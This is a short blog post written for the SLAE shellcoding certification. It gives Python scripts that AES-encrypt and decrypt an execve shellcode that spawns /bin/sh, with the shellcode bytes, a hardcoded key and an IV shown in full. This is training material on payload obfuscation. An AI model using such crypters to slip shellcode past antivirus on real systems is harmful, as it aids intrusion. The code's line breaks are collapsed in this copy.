This is the last one and it is about writing a crypter/decrypter. I used python and pycrypto for this task. The execve shellcode starts a shell. The scripts use AES for encryption and decryption.
Here is the code for encryption:
encode.py
from Crypto.Cipher import AES plain=("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") obj=AES.new('Passphrase123456', AES.MODE_CBC, 'IVIVIVIVIVI12345') l=len(plain) r=l%16 p=16-r print "offset: " + str(p) plain = plain+"A"*p ciph=obj.encrypt(plain) encoded="" for x in bytearray(ciph): encoded += '\\x' enc = '%02x' % x encoded += enc print encoded
The output shows first the offset, that is needed to encrypt the shellcode properly. This is needed later in the decryption code.
The offset and the encrypted shellcode have to be adapted in the decryption code. And here is the decryption code:
decode.py
from Crypto.Cipher import AES offset=7 ciph=("\x2c\x5a\xd5\x5f\x2d\x16\xb6\xb9\x68\x30\x90\x9f\xc9\x6d\xa5\x45\x8a\x08\x01\x2e\xe6\x60\x5b\x9f\x23\xb4\xc5\xaa\x77\x0f\x8a\x7f") obj=AES.new('Passphrase123456', AES.MODE_CBC, 'IVIVIVIVIVI12345') t=obj.decrypt(ciph) decoded="" for x in bytearray(t) : decoded += '\\x' enc = '%02x' % (x & 0xff) decoded += enc print decoded[0:-offset*4]
Get the code.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-342
danielsauder 
Leave a Reply